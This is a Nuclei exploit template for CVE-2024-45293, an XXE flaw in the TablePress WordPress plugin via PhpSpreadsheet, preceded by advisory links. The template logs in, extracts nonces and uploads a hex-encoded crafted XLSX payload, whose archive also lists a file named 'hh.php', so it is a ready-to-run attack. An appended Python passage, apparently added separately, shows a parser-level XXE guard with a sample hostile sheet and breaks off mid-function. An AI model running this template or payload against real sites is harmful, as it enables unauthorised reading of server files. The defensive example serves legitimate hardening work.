| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-45293 | 7 Oct 2024 15:03 | – | circl |
| PhpSpreadsheet security vulnerability | 7 Oct 2024 00:00 | – | cnnvd |
| CVE-2024-45293 | 7 Oct 2024 20:03 | – | cve |
| CVE-2024-45293 XML External Entity Reference (XXE) in PHPSpreadsheet's XLSX reader | 7 Oct 2024 20:03 | – | cvelist |
| XXE in PHPSpreadsheet's XLSX reader | 7 Oct 2024 15:58 | – | github |
| CVE-2024-45293 | 7 Oct 2024 20:15 | – | nvd |
| WordPress TablePress Plugin < 2.4.3 Multiple Vulnerabilities | 10 Feb 2025 00:00 | – | openvas |
| CVE-2024-45293 XML External Entity Reference (XXE) in PHPSpreadsheet's XLSX reader | 7 Oct 2024 20:03 | – | osv |
| GHSA-6HWR-6V2F-3M88 XXE in PHPSpreadsheet's XLSX reader | 7 Oct 2024 15:58 | – | osv |
| Drupal Loft Data Grids module < 7.x-2.7, < 7.x-3.0 - Unauthenticated Sensitive Data Exposure vulnerability | 23 Oct 2024 00:00 | – | patchstack |
id: CVE-2024-45293

info:
  name: TablePress < 2.4.3 - XXE Injection
  author: iamnoooob,ritikchaddha
  severity: high
  description: |
    The PHPSpreadsheet library used by the plugin is affected by an XXE vulnerability: the security scanner that is meant to prevent XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure using white space. On servers that allow users to upload their own Excel (XLSX) sheets, server files and sensitive information can be disclosed by providing a crafted sheet.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade TablePress to version 2.4.3 or later to mitigate the vulnerability.
  reference:
    - https://shaheen.beaconred.net/research/2024/10/25/phpspreadsheet-xxe.html
    - https://wpscan.com/vulnerability/c9c13e5b-22ac-44c1-aca7-e2b34238e045/
    - https://wordpress.org/plugins/tablepress/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45293
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45293
    cwe-id: CWE-611
    epss-score: 0.02859
    epss-percentile: 0.84991
    cpe: cpe:2.3:a:tablepress:tablepress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wordpress
    product: tablepress
    fofa-query: body="/wp-content/plugins/tablepress"
    google-query: inurl:"/wp-content/plugins/tablepress"
  tags: cve2024,cve,tablepress,wp,wp-plugin,wordpress,xxe,intrusive,vuln

flow: http(1) && http(2)

variables:
  payload: "{{hex_decode('504b030414000000080065588959479244b25a010000f004000013001c005b436f6e74656e745f54797065735d2e786d6c55540900032e9656672e96566775780b000104f50100000400000000ad94cb4ec3301045f77c45e42d4a9cb2400835ed82c2122a513e60b0278d55c7b66cf7f5f74c929697d440956e6245f1bd67723de3f17457eb64833e286b0a36ca7296a011562ab32cd8dbe229bd6349886024686bb0607b0c6c3ab91a2ff60e434262130a56c5e8ee390fa2c21a42661d1afa525a5f43a457bfe40ec40a96c86ff2fc960b6b229a98c6c6834dc62fc4f74a6232071f9fa1260cdf691ec90dbbe728233f963c74c2865d30704e2b01910ae71b237f51535b964aa0b4625d93246b6dae1b177e1218e25e63188c0ace23c85021c65a679de9913cc312d63a268f3b72ef32f7a8c379bc43981929db3da152ae8fd0ff43a7759b8141907ee6614badd413fad6fad5bbb5ab4bc7deac590dcaf41d3a89e7debac00935b8006c929328534796e8a3fa3af65eb6b01ecf871f9ba051ff937848bb8d26f076193e583f63fff4ff6bd42af0285fa3a7e6b8f8c47df73ed6c1db0b6bf201504b03040a00000000006978895900000000000000000000000009001c00646f6350726f70732f555409000375ce5667d3ce566775780b000104f50100000400000000504b03041400000008006558895961649db4860100004503000010001c00646f6350726f70732f6170702e786d6c55540900032e9656672e96566775780b000104f501000004000000009d53416edb3010bcf71502ef3165a3280a8362d03a2d7268500376d2f3965a59442892e06e04bbaf2f25c38adce4549e666707c3e19254b7c7ce153d26b2c15762b9284581de84dafa43251ef7df6f3e8b82187c0d2e78acc40949dcea0f6a9b42c4c416a9c80e9e2ad132c7b594645aec8016b9ed73a709a903ce653ac8d034d6e05d302f1d7a96abb2fc24f1c8e86bac6fe26428ce8eeb9effd7b40e66c8474ffb53cc7e5a7d89d159039c0fa91fac498142c3c5b7a341a7e4bca9b2d10ecd4bb27cd2a592f352ed0c38dc6463dd802354f29550f708c3ccb6601369d5f3ba47c3211564ffe4a9ad44f11b08873895e82159f02cceb2733162178993fe15d233b5884c4a4ee408e7da39b61ff5721464702d9453908caf23ee2d3ba49fcd1612bf9378394f3c6610ef657c13f1b2d93ff69bd045f0798672420fe0e1808376423fac7fa6c7b80f77c07819f235a9762d24acf3bd4c973011ea3ea74d2eebbfe6e8c389afeba9a44d0bfe80f5c5e26d6378314fe75fa197ab4599d7f8502e9c92af1f40ff05504b030414000000080065588959edae97d5710100001103000011001c00646f6350726f70732f636f72652e786d6c55540900032e9656672e96566775780b000104f50100000400000000a592514fc3201485dffd150dafa6033663b4e96ae2cc9e343171465f11ae1bae0502576bffbd946e9d53df7c6a4ecfe1e3de13caabcfa6ce3ec0076dcd9cf009231918699536eb39795c2df30b9205144689da1a98930e02b9aa4e4ae90a693ddc7bebc0a38690459009857473b2417405a5416ea011611213269aafd63702a3f46bea84dc8a35d02963e7b401144aa0a03d30772391ec904a8e48f7eeeb045092420d0d180c944f383d64117c13fe3c909c6fc94663e7e0cfe8de1cd39f418fc1b66d27ed2c45e3fc9c3edfdd3ea455736dfaaa2490aa54b2901e045a5f3d9aadb1adc916832ee937afefb11601ef62e3af1ad475f73bfe3b52eed61c30a0b2385e312cb3779e668b9bd5925453363dcbf93467972bce0b362b383f65ac60ac1fe30872a036bb9bfe87dd535217a8b186b85afaaaecc1c53b55d80060aa63b0fba08220bd76189f6395aca31f5187f79737903898a3881d6da16bad57a14a8d1d54ff52e37e6bebbbc1faa18e5e71f505504b0304140000000800367989590e45da9b040400007a54000006001c0068682e7068705554090003f8cf5667fdcf566775780b000104f50100000400000000ed9c4b73da3010c7eff914bda53dc8e8e1671fd3018704f31e0c93de9884b825d30ca4e0f4d40f5f49262458368fd8264e662fc04846dad56ff72fd933ebafdfefa7f72727c1643afff0f3f62e18ff0ac2f1643e0b8359b8fc78ca3b3f572abc230c1615defc375884daf5d532307514cc26f39be0dff6d65bf143b30d431b0dcfade35d7c1394f1e23f0ff330b841f78bdb5978757d17ecb78687b4ee9a21c5dc55b36d3863267a8819ef3299e637bcf3e1b8e9f93f30256c87ab605efee69573fa6d79a1334b1bb93ed2eff61cdc941e20c505cfef998e184cb8d7ae67b1ff48ebe4f66d93243bd3d6b58b1a6118e35847cdbb30b466af51ad298339068ed97cb849fcffb6e6fa7c2d29a6b43578d150db704bd4d1a7ca2805b89188823b8cc923f50c2eb74d6dd4f5dcde595d9980509b8a199037404e9c84eb57c7430363441c9b498f682d3e44c76b891e9ac1bca69f625e5bcf3a7456cfb9096a0e8e45f6a0f59f097e5986e41b4365f6f459e2c5a56b474eaebb89a9d547eef03245c7b245895fa7c91ac54daa751c4ab46eb5dfeefbeaca122e968f2b9880906a1d9f27b1ee6409615dd8c6680256a186629612845f2eaa5ab81ce4686509b71160000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360000c8001300006c00018000360507e0687155c1eee724add6d5bb622a54a892f8d28d14a2bf58c2a3a53aa4d574bd07063c5a0b9199da1208d87a0bc263e512ee56829e66eaf52238473e7dfc851208882da46cb77fdccb5b329969dd5ddd482655941e8c8624251c58ae2c645b57d8505a6aca54e5412cff7061e633a15b8f4fc672e50c2d292d02c7b0968de91ddf1799bfc2c20aadd3eaa0e6229f32ccdf5a7bc52ace20bce5632cca8222ea2a69451a59e1a0cdf3b659e7647aaf5fc73ae1c5c3d881ad7227a309622cf0ab1f88d6d212b3db6128363d02258b795d3c6da1b4e5e563cabe1e660d3e4ae16a3a3a52ece4e5be7ae17df6c37048d31994b7a015ada1f46ac62cdad9e67a39122a3396aceeb9c3b5fb8e53dbe4925124455e66cd35e3993ed352b698bc533cd4ce4241cda28e95fa79fb4451b6a264176cd1b2ae71c23ed3ee1d8709f0e9d451ddc853d4ef20d47a7ea8e5a059de8d637334999cd83c660bab539f533edacd563e794a82fdabdf8268575c9f65d69914c242771f2368bf646e75d9df9dfe2fe7ad886b1da93f9cdba781f4bb38f2ebd6e1c2dc1052deffa462531f5b92a1896547c71e042dcb6f8b384d559acd9172b6d59c6fb57ca574cfeb22dc531deaa064f0232070d33ad6dc77d4c763f2e8c6e62f3346e7308fe357d98fdde6f82a8b5b20896f387c524f85609c249653a5f86cbd34f5f4efe03504b03040a00000000006978895900000000000000000000000006001c005f72656c732f555409000375ce5667d3ce566775780b000104f50100000400000000504b03041400000008006558895917b63738e90000004b0200000b001c005f72656c732f2e72656c7355540900032e9656672e96566775780b000104f50100000400000000ad92cd6ac3300c80ef7b0aa37ba3b48531469d5ecaa0b732b207d06ce5872496b1bd2d7dfb7987b105bad2c38e96a54f9f8476fb791ad53b87d88bd3b02e4a50ec8cd8deb51a5eeaa7d503a898c8591ac5b1863347d85777bb671e29e59ad8f53eaa0c71514397927f448ca6e38962219e5dfe69244c94f233b4e8c90cd4326ecaf21ec36f06540ba63a5a0de168b7a0eab3e75bd8d234bde18398b7895dbad002794eec2cdb950fb93ea43e0fa36a0a2d270d56cc29872392f74546035e36dadc6ef4f7b43871224b89d048e0eb3e5f19d784d6ffb9a265c68fcd3ce28784e15564f876c1c50d549f504b03040a00000000006978895900000000000000000000000003001c00786c2f555409000375ce566776ce566775780b000104f50100000400000000504b0304140000000800655889595ceeed2eac010000f50200000f001c00786c2f776f726b626f6f6b2e786d6c55540900032e9656672e96566775780b000104f501000004000000008d924b4f1b410c80effd15a3b9975d2a406d940d52a16991fa4025a5e7c9ac97b59897c6de04f8f5f54c929672622f1ebfedcf3b3f7ff04e6d2013c6d0e9e3a3562b0836f618ee3afd6bb57cfb5e2b62137ae362804e3f02e9f3c59bf936e6fb758cf74af267948c155fca409037a08b3150a747e6346b1ab223784347314110cf10b3372c6abe6b48724c4f23007bd7bc6bdbb3c61b0cfb0ab3fc9a1a7118d0c265b49387c0bb22199c615989464ca417f3011ddceeb65426a5efc6cbbc0f4e2b67883ff5c8d077fa44d4b885ff0c794a1f277445396d4f75b3f8bbf97556c20976a55623d2efbda30415798bb0a57ff14555c6326e6065d69d16d266e2b844c7902f0dc3e71ca754b9739e04e28099f8a6a0a9c11e037a7c2a730dc69104d018b75f62c6a718d8b81b9ba37387e4e2abb9d28b9e1b8502a37d19ce66fdb300ebf4592bbd3648b84687fcd8e9fa7650b66a9ead556f76902a540a8540d54b2b115732ebb1309ca13cf2557f528b1c327b1830405f0092d865265b988a28791feaa7abfe4d3877bad0dae917d12707f544527e989cbb10eb8ff0359abeb292dfc3c2726f2f96d2f77088c51f504b03040a0000000000697889590000000000000000000000000e001c00786c2f776f726b7368656574732f555409000375ce5667d3ce566775780b000104f50100000400000000504b0304140000000800655889593bb09071560200001205000018001c00786c2f776f726b7368656574732f7368656574312e786d6c55540900032e9656672e96566775780b000104f501000004000000008d544d4fdc3010bdf75758beb3c9b6f4835536888228485420a0edd9eb4c120b3be3dace66e1d777ec4d9645f4b087289e71e6f9bde79914a71ba3d91a9c57d82df97c9673069dc44a75cd92ff7abc3cfac6990fa2ab84c60e96fc193c3f2d3f1403ba27df020446000b6f85a44debc0835b038fc9ce2f791b825d6499972d18e16768a1a39d1a9d118142d7649e6a4495908cce3ee6f997cc08d58d080b770806d6b5927081b237d0852d88032d0269f2adb27e42db5407e1554e0ca47fe2b347f162bbb3c39b1fbfc3334a3af45887994433527baff2243b79a373630e03828d84ffd864e421ba8c704fbd3d22384bdeac9456e139617166e4e2bae9d08995a67b245d42ee8914efe10f97494865917277ae2cb00f5a7570e798ef0d117afe0e1a07ea3c3e25ee55d38698c8ca22dbd5558aee36362973502ff9d97c7196be481ffc5630f8bd350b62f5001a64802a41c76e5d213ec5cd6b4a5197fb16871f4e5537c4863a35b81eb6c97b1cce515f91109a8a584dc0092b1e2ee8b58673d03a72a082bf239d57b6f18cfdf544ec32dd0409afa016bd0e74ce158c5a8f67c79c8dd6dcc01af47df4247f9b2356313789be10419485c381b9ad7d56c4919b2f226319939120a17b8ad7655e646ba225e9a19a89e016c43ad5855b9be68535afa6d4427b7265977980303a4524ac68e0a7708da21a0d35ede4b3af9cb9ada4b40e68d3ea33672b0c01cd14b5c9dd187de2ac460c5330e2d241bd655658700fea05923e748aa63b0df5928f1e926a2962c7ce7332ab56e111779e8ef11f5585368511f8d6a5732b1cbac716ba5bfaf3a59bdbfdceca7f504b03040a00000000006978895900000000000000000000000014001c00786c2f776f726b7368656574732f5f72656c732f555409000375ce5667d3ce566775780b000104f50100000400000000504b030414000000080065588959cd4b5222780000008d00000023001c00786c2f776f726b7368656574732f5f72656c732f7368656574312e786d6c2e72656c7355540900032e9656672e96566775780b000104f501000004000000004d8c310e022110007b5f41b6f7400b63cc71d7f900a30fd8702b1061212c31fa7b292d27939979fde4a4ded42416b670980c286257b6c8dec2e37edd9f414947de3015260b5f125897dd7ca3847d3412621535262c1642eff5a2b5b84019652a957898676919fbc0e67545f7424ffa68cc49b7ff07e8e507504b0304140000000800655889593df2251dc3010000ed0300000d001c00786c2f7374796c65732e786d6c55540900032e9656672e96566775780b000104f5010000040000000085534d8bdc300cbdf75718dfbb4e065ada25c9d216023d7429ec147a75622563ea2f6c6598f4d7d78e33930cbbd05cfcf4243dc9b2523d5db42267f0415a53d3f2a1a0044c6f8534634d7f1ddbf79f2809c88de0ca1aa8e90c813e35efaa80b38297130092a8f0181cefa3d77908e0cf401369424d4f88ee91b1d09f40f3f0601d98e819acd71ca3e94716620e17212969c50e45f191692e0d6d2a33e9566320bd9d0cd6b4a0aca9066b36a6a49968aa8e9cb95a43e40e07f4f20fec88296313efb2f8ff66bb2c93d55b653df16357d3b62d962fd186eb55e21b57b2f332912c175e8e10db904addfa3ad04c3495e388e04d1b0db2e2e3ec606b80e5b8ff448f9ecfe5e1c32e613962ddce7a111f6f3f914c35958201638297e3299d681d4b4e44ab2310928fd6709524af192b88b23d28f5925ef8f770a77d19487e95ef220d94a4db5f616c688559261b497faf96b55fcb5e86d792f7a5ded627dc3935b7366f48b69e27dd816f9725dbc54481cdfaba686cf6172547a3e1b6686c6d73378bbb966f2c49eb51d3e7544dd1ed1edd24154af3c614a2a6b80cf77b8dbc8bbf53ae2260e093c2e38daae9867f809093fe4caf513fe5d9e21ab5e02d74d969b6fda8cd3f504b03040a00000000006978895900000000000000000000000009001c00786c2f7468656d652f555409000375ce5667d3ce566775780b000104f50100000400000000504b03041400000008006558895973917b59bb050000a61b000013001c00786c2f7468656d652f7468656d65312e786d6c55540900032e9656672e96566775780b000104f50100000400000000ed594f6fdb3614bfef5310bab7b26c2975823a45ecd8ed96a60d12b7438fb4444bac295120e9a4be0ded71c08061ddb0cb80dd7618b61568815dba4f93adc3d601fd0a7bfa639b8aa93469336c43eb832d92bff79feff151be7aed41ccd0211192f2a46339971b162289cf039a841debce7070a96d21a9701260c613d2b166445ad7363fb88a3754446282803c911bb863454aa51bb62d7d98c6f2324f49026b632e62ac6028423b10f808d8c6cc6e361a6b768c6962a104c7c0f5f6784c7d8286194b6b73cebccfe02b51329bf09938f073893a458e0d264ef62367b2c7043ac4ac63819c801f0dc903652186a582858ed5c83f96bd79d55e10315543abd10df24f4957120493664e27c2d182d019b8eb57b617fc9b05ff555cbfdfeff59d05bf1c807d1f2c7556b0eea0ed74e73c3550f1b8cabbd7f01a6e15aff16fade0d7bbddaeb75ec1b796787705df6eacb95bcd0ade5de2bd55fdbb5bbdde5a05ef2df16b2bf8c195f535b78acf4111a3c964059dc57311990564ccd90d23bc0df0f67c032c51b6b6bb0afa44d5edb518dfe76200803cb858d104a9594ac6d8075c0fc723417126006f10acad1453be5c99ca6421e90b9aaa8ef5518a2123969057cf7f78f5fc297af5fcc9f1c367c70f7f3e7ef4e8f8e14f06c21b380975c297df7dfed7379fa03f9f7efbf2f19766bcd4f1bffdf8e9afbf7c61062a1df8e2ab27bf3f7bf2e2ebcffef8feb101be25f048870f694c24ba458ed03e8fc13683003212e7a3184698562870044803b0afa20af0d60c3313ae4baacebb2ba0009880d7a7f72bba1e4462aaa801b813c515e02ee7accb85d19c9d4c966ece3409cdc2c554c7ed637c6892dd3b11dafe34859d4c4d2c7b11a9a8b9c720da38240951285be313420c64f728adf87597fa824b3e56e81e455d4c8d2e19d2913213dda031c465665210425df1cdee5dd4e5ccc47e9b1c56919010989958125671e3753c5538366a8c63a6236f621599943c9809bfe270a920d221611cf50322a589e6b69855d4ddc150898c61df65b3b88a148a4e4cc89b98731db9cd27bd08c7a951679a443af64339812d8ad11e574625783543b231c40127b5e1be4b893a5f5adfa16164de20d9ca54985282f06a3eced81893a4acef954a1dd3e4b4b2cd28d4edf7657b0edf8243cc943c278b751dee7f58a2b7f134d9239015ef2bf4fb0afd2e56e8ba5cbef8babc2cc5b6de6be76ce2dac67b4c193b5033466ecabc884b302f18c0643ec889167d7e1ac16329ae820b05ce9f91e0ea63aaa28308a720c6c92584b2641d4a947209b70bab96777e45a560733ee7cdef9580c66a9707c5744bbf6f2ed8e4a350ea825a1983b30a6b5d793b614e013ca334c7334bf34e95666bde84bc41387b99e0ac350bd1b051302341e6f782c13c2c171e2219e1809431728c8638ad33baadfd7aaf69d2d65b6f27ed2c41d2c5b935e2bc0b885263254af66a3ab2a43a4247a095d7f42ce4e3b4638da1e782c738057e322b55988549c7f25569ca6b93f9a4c1e66de9346a0dae88488554db58460555be347f1d932cf56f7a6ee6878b31c0508dcea645abedfc8b5ad827434bc663e2ab9a99e5b05ce35345c441141ca1119b8a7d0c7abbc5ee0aa884a3a2391f08c850b7dc78d5cc2fb3e0e46b9f323b304b235cd6a4b616fb029e3f2f74c8479a7a768dee6f684aeb024df1de5d53b29d0b0d6e2bc8af5ed006088cb23ddab1b85011872a9446d41f08681c7259a01782b4c854422c7b879de94a0e9775abe05114b93052fb34448242a5539120644f9576be8699d3d4cfd739a3b2ce2cd49569f13b2287840db3ec5dcbecb75034af26a52372dcc9a0d9a6ec1a8583ff70e7e3d6743ea7b7074b41ee797a11572bfada51b0fe762a9cf3a86d9a2d6e7a673e6a53b8a6a0ec0b0a37153e5bf6b743be0fd1478b8e12c146bcd42ed36f3139029ddb9a7119ab7fb68d5a86a05d13ef8b6c3e3567b76a9c7dbab83777b667f0b577baabedd514b5b58b4c3e5af9338b8fee83ec6db81f4d9992c57ba7077029edcdff86003ef69274f36f504b03040a00000000006978895900000000000000000000000009001c00786c2f5f72656c732f555409000375ce5667d3ce566775780b000104f50100000400000000504b0304140000000800655889598424b156e9000000b90200001a001c00786c2f5f72656c732f776f726b626f6f6b2e786d6c2e72656c7355540900032e9656672e96566775780b000104f50100000400000000ad92c16ac3301044effd0ab1f75a765a4a29917329815c5bf70384b4b64c6c4968376dfdf7551b481c08a1079fc4acd899c748ebcdf738884f4cd407afa02a4a10e84db0bdef147c34dbfb6710c4da5b3d048f0a2624d8d477eb371c34e71d727d24914d3c2970ccf1454a320e474d4588e8f34d1bd2a839cbd4c9a8cd5e77285765f924d3dc03ea0b4fb1b30ad2ce56209a29e27fbc43dbf6065f83398ce8f94a84249e86cc2f1a9d3a6405475d641f90d7e3574bc673dec573fa9f3c0eab5b0c0f8b56e07442fbce293ff0bc89f9f816cce392305f21edc921f219e434fa45cdc7a91979f1e3ea1f504b0304140000000800f3798959dca8b940150100004901000014001c00786c2f736861726564537472696e67732e786d6c555409000359d1566759d1566775780b000104f5010000040000000015905d4fc2301885eff9152f4d900b854e8298c856628045302a91294ee345dd5eb6c6ae1d6d27e3df5b2ecf47f2e49c70d65612fed058a15544ae8701015499ce852a22e8bf25f1e0b60fd6719573a91546e48496cc58e7f27e711c74172ff324dd2c61af357c41d85d3e27ab24851eb42dc236dd26cb27207559df51ba17d2a1a1d4a0d58dc930cab9e3de77d83a5a4b2ed4f4875b9c8caf36f3384ee4ebfa3dfe2df8ee26f8fc5837e9ee58ac47b1484f59b15a8c1f0930e879c8f49b75426b1df819ca46a474ee0cb3598915b7435da3f2c95e9b8a3b2f4d416d6d90e7b6447495a4a32098d0cac309344a1c1a9ceb46397f0461a1152c74ec01a5d4b0d346e6702194dfa0b89c4237a48e85f4dca19ecffe01504b01021e0314000000080065588959479244b25a010000f0040000130018000000000001000000a481000000005b436f6e74656e745f54797065735d2e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000090018000000000000001000ed41a7010000646f6350726f70732f555405000375ce566775780b000104f50100000400000000504b01021e031400000008006558895961649db48601000045030000100018000000000001000000a481ea010000646f6350726f70732f6170702e786d6c55540500032e96566775780b000104f50100000400000000504b01021e0314000000080065588959edae97d57101000011030000110018000000000001000000a481ba030000646f6350726f70732f636f72652e786d6c55540500032e96566775780b000104f50100000400000000504b01021e03140000000800367989590e45da9b040400007a540000060018000000000001000000a4817605000068682e7068705554050003f8cf566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000060018000000000000001000ed41ba0900005f72656c732f555405000375ce566775780b000104f50100000400000000504b01021e031400000008006558895917b63738e90000004b0200000b0018000000000001000000a481fa0900005f72656c732f2e72656c7355540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000030018000000000000001000ed41280b0000786c2f555405000375ce566775780b000104f50100000400000000504b01021e031400000800655889595ceeed2eac010000f50200000f0018000000000001000000a481650b0000786c2f776f726b626f6f6b2e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a0000000000697889590000000000000000000000000e0018000000000000001000ed415a0d0000786c2f776f726b7368656574732f555405000375ce566775780b000104f50100000400000000504b01021e03140000000800655889593bb090715602000012050000180018000000000001000000a481a20d0000786c2f776f726b7368656574732f7368656574312e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000140018000000000000001000ed414a100000786c2f776f726b7368656574732f5f72656c732f555405000375ce566775780b000104f50100000400000000504b01021e0314000000080065588959cd4b5222780000008d000000230018000000000001000000a48198100000786c2f776f726b7368656574732f5f72656c732f7368656574312e786d6c2e72656c7355540500032e96566775780b000104f50100000400000000504b01021e03140000000800655889593df2251dc3010000ed0300000d0018000000000001000000a4816d110000786c2f7374796c65732e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000090018000000000000001000ed4177130000786c2f7468656d652f555405000375ce566775780b000104f50100000400000000504b01021e031400000008006558895973917b59bb050000a61b0000130018000000000001000000a481ba130000786c2f7468656d652f7468656d65312e786d6c55540500032e96566775780b000104f50100000400000000504b01021e030a000000000069788959000000000000000000000000090018000000000000001000ed41c2190000786c2f5f72656c732f555405000375ce566775780b000104f50100000400000000504b01021e03140000000800655889598424b156e9000000b90200001a0018000000000001000000a481051a0000786c2f5f72656c732f776f726b626f6f6b2e786d6c2e72656c7355540500032e96566775780b000104f50100000400000000504b01021e03140000000800f3798959dca8b9401501000049010000140018000000000001000000a481421b0000786c2f736861726564537472696e67732e786d6c555405000359d1566775780b000104f50100000400000000504b0506000000001300130055060000a51c00000000')}}"
  filename: "{{rand_base(7)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=tablepress_import HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: closedpost
        group: 1
        regex:
          - 'name="closedpostboxesnonce" value="([0-9a-z]+)"'
        internal: true

      - type: regex
        part: body
        name: meta_box
        group: 1
        regex:
          - 'name="meta\-box\-order\-nonce" value="([a-z0-9]+)"'
        internal: true

      - type: regex
        name: _wpnonce
        part: body
        group: 1
        regex:
          - 'name="_wpnonce" value="([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuVnytOHlVXMXeHFy

        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="closedpostboxesnonce"

        {{closedpost}}
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="meta-box-order-nonce"

        {{meta_box}}
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="_wpnonce"

        {{_wpnonce}}
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp-admin/admin.php?page=tablepress_import
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="action"

        tablepress_import
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="import[source]"

        file-upload
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="import_file_upload[]"; filename="{{filename}}.xlsx"
        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

        {{payload}}
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="import[type]"

        add
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy
        Content-Disposition: form-data; name="import[legacy_import]"

        false
        ------WebKitFormBoundaryuVnytOHlVXMXeHFy--

      - |
        GET /wp-admin/admin.php?page=tablepress&action=edit&table_id={{id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "Hello World abc")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: id
        part: location
        group: 1
        regex:
          - 'table_id=([0-9]+)'
        internal: true
# digest: 4a0a00473045022100834e95d90e53021f0fc533094d8160eaacab82b38ab506d6e7e4a8e33d98632c02201633c3c9a4b350168e12191cc94c9f139d5b56b392e501bd64ff70a182c04449:922c64590222798bb761d5b6d8e72950
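The template's description says the XLSX reader's XXE protection was a scanner inspecting the XML text, and that white-space changes to the XML structure slipped past it. The script below is an added example, not code from PhpSpreadsheet, TablePress or the template's authors, showing the defensive alternative: let the XML tokenizer itself report any DOCTYPE, entity declaration or external entity reference, so the decision no longer depends on how a declaration is spelled or spaced. It is written in Python (expat) to keep it self-contained; the zip layout, the part contents, the `file:///tmp/constructed-secret.txt` SYSTEM identifier and all function names are constructed for the example.

```python
"""Parser-level XXE guard for the XML parts of an XLSX upload (added example,
not PhpSpreadsheet, TablePress or Nuclei code). Instead of searching raw text
for "<!DOCTYPE" or "<!ENTITY", which depends on how a declaration is spelled
and spaced, the XML tokenizer (expat) reports DTD constructs as it meets them."""
import io
import xml.parsers.expat as expat
import zipfile


class UnsafeXmlError(ValueError):
    """Raised when an XML part contains a DTD construct we never accept."""


def scan_xml_part(data: bytes) -> int:
    """Tokenize one XML part and return its element count; raise UnsafeXmlError
    on any DOCTYPE, entity declaration or external entity reference."""
    parser = expat.ParserCreate()
    # Never read parameter entities, so an external DTD subset is never fetched.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    element_count = 0

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE {name!r} is not allowed in spreadsheet XML")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXmlError(f"entity declaration {name!r} is not allowed")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXmlError(f"external entity reference {sysid!r} is not allowed")

    def on_start_element(name, attrs):
        nonlocal element_count
        element_count += 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl  # defence in depth: only reachable after a DOCTYPE
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start_element
    parser.Parse(data, True)  # malformed XML raises expat.ExpatError; also a rejection
    return element_count


def scan_xlsx(zip_bytes: bytes) -> dict:
    """Scan every XML part of an XLSX-style zip and return {part_name: element_count}.
    Binary parts are skipped; the first unsafe part aborts with an error naming it."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            try:
                results[name] = scan_xml_part(zf.read(name))
            except UnsafeXmlError as exc:
                raise UnsafeXmlError(f"{name}: {exc}") from exc
    return results


def check_upload(zip_bytes: bytes) -> str:
    """What an upload handler would call: "accepted" or "rejected: <reason>"."""
    try:
        scan_xlsx(zip_bytes)
    except (UnsafeXmlError, expat.ExpatError, zipfile.BadZipFile) as exc:
        return f"rejected: {exc}"
    return "accepted"


# Constructed sample parts (not a real workbook; just enough for the scanner).
BENIGN_SHEET = b"""<?xml version="1.0" encoding="UTF-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetData><row r="1"><c r="A1" t="inlineStr"><is><t>Hello World abc</t></is></c></row></sheetData>
</worksheet>"""

# Hostile sheet: the DOCTYPE is padded with blank lines, a comment and extra spaces,
# the kind of surface variation a text-matching check may be sensitive to; the
# tokenizer still reports exactly one DOCTYPE. The SYSTEM path is a placeholder.
DTD_SHEET = b"""<?xml version="1.0" encoding="UTF-8"?>

<!-- padding -->
<!DOCTYPE   worksheet   [
    <!ENTITY   leak   SYSTEM   "file:///tmp/constructed-secret.txt">
]>
<worksheet><sheetData><row><c><v>&leak;</v></c></row></sheetData></worksheet>"""


def build_xlsx_like(sheet_xml: bytes) -> bytes:
    """Zip the minimum parts an XLSX reader would open, plus one binary part."""
    buf = io.BytesIO()
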